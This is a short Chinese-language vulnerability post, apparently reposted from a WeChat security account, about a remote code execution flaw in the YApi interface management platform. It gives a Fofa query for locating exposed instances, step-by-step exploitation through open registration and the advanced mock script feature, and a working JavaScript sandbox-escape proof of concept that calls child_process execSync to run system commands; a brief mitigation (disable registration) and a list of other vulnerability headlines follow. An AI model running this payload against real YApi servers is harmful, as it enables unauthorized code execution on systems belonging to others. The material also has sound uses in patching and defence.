Yapi Mock 远程代码执行漏洞

2021年11月26日02:25:48评论183 views字数 541阅读1分48秒阅读模式

漏洞描述

YApi接口管理平台远程代码执行0day漏洞，攻击者可通过平台注册用户添加接口，设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态，强烈建议客户尽快采取缓解措施以避免受此漏洞影响

Fofa:app="YApi"

Yapi Mock 远程代码执行漏洞

默认开启注册功能

Yapi Mock 远程代码执行漏洞

注册后新建项目

Yapi Mock 远程代码执行漏洞

添加接口

Yapi Mock 远程代码执行漏洞

高级Mock>脚本>开启,写入POC并保存：

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

Yapi Mock 远程代码执行漏洞

保存后预览：

Yapi Mock 远程代码执行漏洞

Yapi作者已经停止更新。临时修复建议禁止用户注册，具体配置参考原文链接：

https://github.com/YMFE/yapi/issues/2099

本文始发于微信公众号（安全鸭）：Yapi Mock 远程代码执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

Yapi Mock 远程代码执行漏洞

用友NC Cloud importhttpscer接口存在任意文件上传漏洞

GL.iNet 路由器身份验证绕过漏洞 (CVE-2023-46453)

【漏洞预警】SEMCMS安全漏洞(CVE-2024-30938)

1day分享｜ Geoserver命令执行漏洞

漏洞预警 JEECMS o_upload 文件上传漏洞

用友U9 PatchFile.asmx接口存在任意文件上传漏洞

万户ezOFFICE-wf_printnum.jspSQL注入漏洞-附py

【漏洞预警】Progress Flowmon命令注入漏洞（CVE-2024-2389）

某捷通T KeyInfoList.aspx sql注入-附py

泰博云平台solr接口存在SSRF漏洞|漏洞预警

发表评论

在线咨询

微信